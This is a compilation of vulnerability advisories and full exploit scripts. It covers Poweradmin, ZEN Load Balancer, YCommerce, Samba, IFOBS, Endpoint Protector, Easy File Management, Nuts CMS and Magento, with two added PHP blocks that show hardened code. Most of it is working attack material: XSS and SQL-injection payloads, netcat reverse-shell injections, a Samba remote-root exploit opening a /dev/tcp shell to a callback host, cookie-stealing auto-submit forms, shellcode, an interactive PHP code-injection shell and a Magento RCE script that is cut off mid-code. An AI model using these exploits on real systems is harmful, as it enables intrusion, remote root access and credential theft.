Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E
source: https://www.securityfocus.com/bid/55622/info
The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected.
GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1
source: https://www.securityfocus.com/bid/55638/info
ZEN Load Balancer is prone to the following security vulnerabilities:
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability
An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive information.
ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable.
http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/
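The first three ZEN Load Balancer URLs above show the command-injection class: request parameters (filelog, nlines, if) are placed into a shell command line, so shell metacharacters in any of them start a new command. The block below is an added example, not ZEN Load Balancer code (its web UI is Perl CGI); it reproduces the bug class in PHP to match the rest of this page, as a log viewer that runs "tail -n <nlines> <filelog>". The vulnerable builder is kept only as a string for contrast and is never executed; the hardened path allowlists the file name, validates the line count, and executes an argv array so no shell ever parses the input. The directory, file names, function names and the sample log are constructed, and the demo assumes a Unix host with tail and PHP 7.4 or later.

```php
<?php
// Added example, not ZEN Load Balancer code: the command-injection class from the
// advisory above, with a hardened version that never hands request data to a shell.
declare(strict_types=1);

const LOG_DIR = __DIR__ . '/demo-logs';           // assumption: a directory this script owns
const ALLOWED_LOGS = ['access.log', 'error.log'];  // the only names a request may refer to

// Vulnerable shape (for contrast only, never executed here): both values are
// interpolated into a shell command line, so ';', '&', '|' and friends become new commands.
function vulnerableCommandLine(array $p): string {
    return "tail -n {$p['nlines']} " . LOG_DIR . "/{$p['filelog']}";
}

// Hardened: returns an argv array for tail, or null when the request is not acceptable.
function safeTailArgv(array $p): ?array {
    $file = $p['filelog'] ?? '';
    if (!in_array($file, ALLOWED_LOGS, true)) {
        return null;                                   // not one of the known logs
    }
    $n = filter_var($p['nlines'] ?? null, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1, 'max_range' => 1000]]);
    if ($n === false) {
        return null;                                   // not a small positive integer
    }
    return ['tail', '-n', (string) $n, LOG_DIR . '/' . $file];
}

function tailLog(array $p): ?string {
    $argv = safeTailArgv($p);
    if ($argv === null) {
        return null;
    }
    // Passing an array to proc_open (PHP 7.4+) execs the program directly, bypassing /bin/sh.
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Demo with a constructed log file.
if (!is_dir(LOG_DIR)) {
    mkdir(LOG_DIR);
}
file_put_contents(LOG_DIR . '/access.log', "first\nsecond\nthird\n");

echo tailLog(['filelog' => 'access.log', 'nlines' => '1']);                            // third
var_dump(safeTailArgv(['filelog' => 'access.log; echo injected', 'nlines' => '1']));   // NULL
var_dump(safeTailArgv(['filelog' => 'access.log', 'nlines' => '1; echo injected']));   // NULL
// What the shell would have seen in the vulnerable version:
echo vulnerableCommandLine(['filelog' => 'access.log', 'nlines' => '1; echo injected']), "\n";
```

The allowlist is deliberately stricter than escaping: escapeshellarg() would neutralise the metacharacters, but it would still let a request name any readable file on the host, which is the information-disclosure half of the same advisory. Where a shell is unavoidable, escapeshellarg() on every argument is the minimum; where it is not, the argv form removes the shell from the picture entirely.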
source: https://www.securityfocus.com/bid/55653/info
YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
source: https://www.securityfocus.com/bid/55577/info
minimal Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
minimal Gallery 0.8.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?c=[XSS]
http://www.example.com/PAth/index.php?s=[XSS]
http://www.example.com/PAth/index.php?s=y&id=[XSS]
http://www.example.com/PAth/index.php?m=[XSS]
http://www.example.com/PAth/index.php?d=[XSS]
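The Purity, Poweradmin, MF Gig Calendar and minimal Gallery reports above are all the same reflected XSS defect: a request parameter is written back into the page without encoding for the context it lands in, so a value that closes an attribute and opens a script tag is rendered as markup. The block below is an added example, not code from any of those projects: one encoder per output context (HTML text or attribute, a JavaScript string literal, a query-string component), applied to the payload shape from the advisories. The function names and the input are constructed.

```php
<?php
// Added example, not code from the themes or plugins above: context-specific output
// encoding, the fix for the reflected XSS they report. Input is constructed.
declare(strict_types=1);

// HTML text and double- or single-quoted attribute values.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// A JavaScript string literal inside an inline <script>; hex escapes keep
// '<' and '</script>' from ever appearing literally in the page.
function js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
}

// One component of a query string.
function q(string $s): string {
    return rawurlencode($s);
}

// The vulnerable shape, for contrast only (never do this with request data):
//   echo '<input name="s" value="' . $_GET['s'] . '">';
function renderSearch(string $term): string {
    return '<input name="s" value="' . h($term) . '">' . "\n"
         . '<p>Results for ' . h($term) . '</p>' . "\n"
         . '<script>var q = ' . js($term) . ';</script>' . "\n"
         . '<a href="?s=' . q($term) . '&amp;page=2">next</a>';
}

// Constructed input with the shape from the advisories: close the attribute, open a script tag.
$term = '"><script>alert(\'xsstest\')</script>';
echo renderSearch($term), "\n";
```

In the output the attribute now ends at its real closing quote (the injected quote is &quot;), the script tag appears as literal text in both the attribute and the paragraph, the JavaScript literal holds \u003C rather than <, and the link carries a percent-encoded copy. The rule the encoders embody is that the encoding is chosen by where the value is written, not by where it came from; a single "sanitize on input" pass cannot be right for all four contexts at once.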
source: https://www.securityfocus.com/bid/55655/info
Samba is prone to an unspecified remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a denial-of-service condition.
#!/usr/bin/python
#
# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell
# found by eax samba 0day godz (loljk)
from binascii import hexlify, unhexlify
import socket
import threading
import SocketServer
import sys
import os
import time
import struct
targets = [
{
"name" : "samba_3.6.3-debian6",
"chunk_offset" : 0x9148,
"system_libc_offset" : 0xb6d003c0
},
{
"name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
"chunk_offset" : 4560,
"system_libc_offset" : 0xb20
},
{
"name" : "target_finder (hardcode correct system addr)",
"chunk_offset" : 0,
"system_libc_offset" : 0xb6d1a3c0,
"finder": True
}
]
do_brute = True
rs = 1024
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
def dump(src, length=32):
result=[]
for i in xrange(0, len(src), length):
s = src[i:i+length]
hexa = ' '.join(["%02x"%ord(x) for x in s])
printable = s.translate(FILTER)
result.append("%04x %-*s %s\n" % (i, length*3, hexa, printable))
return ''.join(result)
sploitshake = [
# HELLO
"8100004420434b4644454e4543464445" + \
"46464346474546464343414341434143" + \
"41434143410020454745424644464545" + \
"43455046494341434143414341434143" + \
"4143414341414100",
# NTLM_NEGOT
"0000002fff534d427200000000000000" + \
"00000000000000000000000000001d14" + \
"00000000000c00024e54204c4d20302e" + \
"313200",
# SESSION_SETUP
"0000004bff534d427300000000080000" + \
"000000000000000000000000ffff1d14" + \
"000000000dff000000ffff02001d1499" + \
"1f00000000000000000000010000000e" + \
"000000706f736978007079736d6200",
# TREE_CONNECT
"00000044ff534d427500000000080000" + \
"000000000000000000000000ffff1d14" + \
"6400000004ff00000000000100190000" + \
"5c5c2a534d425345525645525c495043" + \
"24003f3f3f3f3f00",
# NT_CREATE
"00000059ff534d42a200000000180100" + \
"00000000000000000000000001001d14" + \
"6400000018ff00000000050016000000" + \
"000000009f0102000000000000000000" + \
"00000000030000000100000040000000" + \
"020000000306005c73616d7200"
]
pwnsauce = {
'smb_bind': \
"00000092ff534d422500000000000100" + \
"00000000000000000000000001001d14" + \
"6400000010000048000004e0ff000000" + \
"0000000000000000004a0048004a0002" + \
"002600babe4f005c504950455c000500" + \
"0b03100000004800000001000000b810" + \
"b8100000000001000000000001007857" + \
"34123412cdabef000123456789ab0000" + \
"0000045d888aeb1cc9119fe808002b10" + \
"486002000000",
'data_chunk': \
"000010efff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"0000000800b0100000b0103f00000000" + \
"00b0100500000110000000b010000001" + \
"0000009810000000000800",
'final_chunk': \
"000009a3ff534d422f00000000180000" + \
"00000000000000000000000001001d14" + \
"640000000eff000000babe00000000ff" + \
"00000008006409000064093f00000000" + \
"00640905000002100000006409000001" + \
"0000004c09000000000800"
}
def exploit(host, port, cbhost, cbport, target):
    global sploitshake, pwnsauce
    chunk_size = 4248
    target_tcp = (host, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(target_tcp)
    n = 0
    for pkt in sploitshake:
        s.send(unhexlify(pkt))
        pkt_res = s.recv(rs)
        n = n+1
    fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b])
    s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid)))
    pkt_res = s.recv(rs)
    buf = "X"*20 # policy handle
    level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS
    buf+=struct.pack('<H',level) # level
    buf+=struct.pack('<H',level)# level2
    buf+=struct.pack('<L',1)#auditing_mode
    buf+=struct.pack('<L',1)#ptr
    buf+=struct.pack('<L',100000) # r->count
    buf+=struct.pack('<L',20) # array_size
    buf+=struct.pack('<L',0)
    buf+=struct.pack('<L',100)
    buf += ("A" * target['chunk_offset'])
    buf+=struct.pack("I", 0);
    buf+=struct.pack("I", target['system_libc_offset']);
    buf+=struct.pack("I", 0);
    buf+=struct.pack("I", target['system_libc_offset']);
    buf+=struct.pack("I", 0xe8150c70);
    buf+="AAAABBBB"
    cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00"
    tmp = cmd*(816/len(cmd))
    tmp += "\x00"*(816-len(tmp))
    buf+=tmp
    buf+="A"*(37192-target['chunk_offset'])
    buf+='z'*(100000 - (28000 + 10000))
    buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)]
    n=0
    for chunk in buf_chunks:
        if len(chunk) != chunk_size:
            #print "LAST CHUNK #%d" % n
            bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk
            s.send(bb)
        else:
            #print "CHUNK #%d" % n
            bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk
            s.send(bb)
            retbuf = s.recv(rs)
        n=n+1
    s.close()

class connectback_shell(SocketServer.BaseRequestHandler):
    def handle(self):
        global do_brute
        print "\n[!] connectback shell from %s" % self.client_address[0]
        do_brute = False
        s = self.request
        import termios, tty, select, os
        old_settings = termios.tcgetattr(0)
        try:
            tty.setcbreak(0)
            c = True
            while c:
                for i in select.select([0, s.fileno()], [], [], 0)[0]:
                    c = os.read(i, 1024)
                    if c:
                        if i == 0:
                            os.write(1, c)
                        os.write(s.fileno() if i == 0 else 1, c)
        except KeyboardInterrupt: pass
        finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass

if len(sys.argv) != 6:
    print "\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
    print " usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
    print " targets:"
    i = 0
    for target in targets:
        print " %02d) %s" % (i, target['name'])
        i = i+1
    print ""
    sys.exit(-1)

target = targets[int(sys.argv[5])]
server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

while do_brute == True:
    sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset']))
    sys.stdout.flush()
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
    if "finder" in target:
        target['chunk_offset'] += 4
    else:
        target['system_libc_offset'] += 0x1000

if "finder" in target:
    print \
    "{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
    "system_libc_offset = 0x%03x" % \
    (target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)

while 1:
    time.sleep(999)
server.shutdown()
source: https://www.securityfocus.com/bid/55561/info
IFOBS is prone to multiple HTML-injection vulnerabilities.
Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
IFOBS XSS-1.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
<input type="hidden" name="secondName" value="<script>alert(document.cookie)</script>">
<input type="hidden" name="myaction" value="1">
</form>
</body>
</html>

IFOBS XSS-2.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
<input type="hidden" name="firstName" value="<script>alert(document.cookie)</script>">
<input type="hidden" name="myaction" value="1">
</form>
</body>
</html>

IFOBS XSS-3.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
<input type="hidden" name="thirdName" value="<script>alert(document.cookie)</script>">
<input type="hidden" name="myaction" value="1">
</form>
</body>
</html>

IFOBS XSS-4.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
<input type="hidden" name="BirthDay" value="<script>alert(document.cookie)</script>">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="1">
</form>
</body>
</html>

IFOBS XSS-5.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientprint.jsp" method="post">
<input type="hidden" name="BirthMonth" value="<script>alert(document.cookie)</script>">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="1">
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/55570/info
CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.
Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.
CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected.
function Get-EPPPassword {
<#
.Synopsis
Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.Description
Get-EPPPassword Timeline:
discovered 3 Mar 2012
reported to vendor 12 Jun 2012
reported to US-CERT 15 Jul 2012
released 17 Sep 2012
.Example
Get-EPPPassword -Serial 123456789
.Link
http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>
    Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)

    #function to calculate sums from serial number
    function GetSerialSum {
        if ($Serial.Length -ne 9) {
            Return "EPP Serial Number is 9 digits"
        }
        else {
            #convert $serial to an array of integers
            [int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
        }
        foreach ($Number in $SerialArray) {
            $Sum += $Number
        }
        Write-Output $Sum
    }

    #function to calculate epproot password
    function GetPassword {
        Write-Output "eroot!00$Sums`RO"
    }

    $Sums = GetSerialSum
    GetPassword
}

Get-EPPPassword -Serial 135792468
source: https://www.securityfocus.com/bid/55589/info
AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AxisInternet VoIP Manager 2.1.5.7 is vulnerable; other versions may also be affected.
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3 %3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&;lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C
https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+
source: https://www.securityfocus.com/bid/55592/info
VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VBulletin 4.1.12 is vulnerable; other versions may also be affected.
http://www.example.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
source: https://www.securityfocus.com/bid/55586/info
TAGWORX.CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/gallery.php?cid=124'&pid=124
http://www.example.com/gallery.php?cat_id=17&cid='&pid=&img=1
http://www.example.com/gallery.php?cid=124'&pid=124
#!/usr/bin/python
# Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow
# Version: 5.6
# Date: 2015-08-17
# Author: Tracy Turben (tracyturben@gmail.com)
# Software Link: http://www.efssoft.com/
# Tested on: Win7x32-EN
# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;)
# Credits for vulnerability discovery:
# superkojiman (http://www.exploit-db.com/exploits/33453/)
from struct import pack
import socket,sys
import os
host="192.168.1.15"
port=80
junk0 = "\x90" * 80
# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll]
# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
call_edx=pack('<L',0x1001D8C8)
junk1="\x90" * 280
ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll]
# Since 0x00 would break the exploit needs to be crafted on the stack
crafted_jmp_esp=pack('<L',0xA44162FB)
test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction
kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
kungfu+=pack('<L',0xDEADBEEF) # filler
kungfu+=pack('<L',0xDEADBEEF) # filler
kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll]
nopsled="\x90" * 20
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
buf="GET /vfolder.ghp HTTP/1.1\r\n"
buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n"
print "[*] Connecting to Host " + host + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((host, port))
    print "[*] Connected to " + host + "!"
except:
    print "[!] " + host + " didn't respond\n"
    sys.exit(0)
print "[*] Sending malformed request..."
s.send(buf)
print "[!] Exploit has been sent!\n"
s.close()
<?php
# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit
#
# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.
# Nuts CMS is an open source solution that is freely available to everyone.
#
# Discovered by Yakir Wizman
# Date 17/08/2015
# Vendor Homepage : http://www.nuts-cms.com/
# CVE : N/A
# Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).
###
# Exploit code:

error_reporting(E_ALL);

$error[0] = "[!] This script is intended to be launched from the cli.";

if(php_sapi_name() <> "cli")
    die($error[0]);

if($argc < 3) {
    echo("\nUsage : php {$argv[0]} <host> <path>");
    echo("\nExample: php {$argv[0]} localhost /");
    die();
}

if(isset($argv[1]) && isset($argv[2])) {
    $host = $argv[1];
    $path = $argv[2];
}

$pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Cmd: %s\r\n";
$pack.= "Connection: close\r\n\r\n";

while(1) {
    print "\nAnonymous@{$host}:~# ";
    if(($cmd = trim(fgets(STDIN))) == "exit")
        break;
    preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

function http_send($host, $pack) {
    if(!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}\n");
    fwrite($sock, $pack);
    return stream_get_contents($sock);
}
?>
#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none
from hashlib import md5
import sys
import re
import base64
import mechanize
def usage():
    # The format string takes the script name twice; the original omitted the arguments.
    print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" % (sys.argv[0], sys.argv[0])
    sys.exit()

if len(sys.argv) != 3:
    usage()
# Command-line args
target = sys.argv[1]
arg = sys.argv[2]
# Config.
username = ''
password = ''
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
request = br.open(target)
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
try:
    request = br.open(exploit)
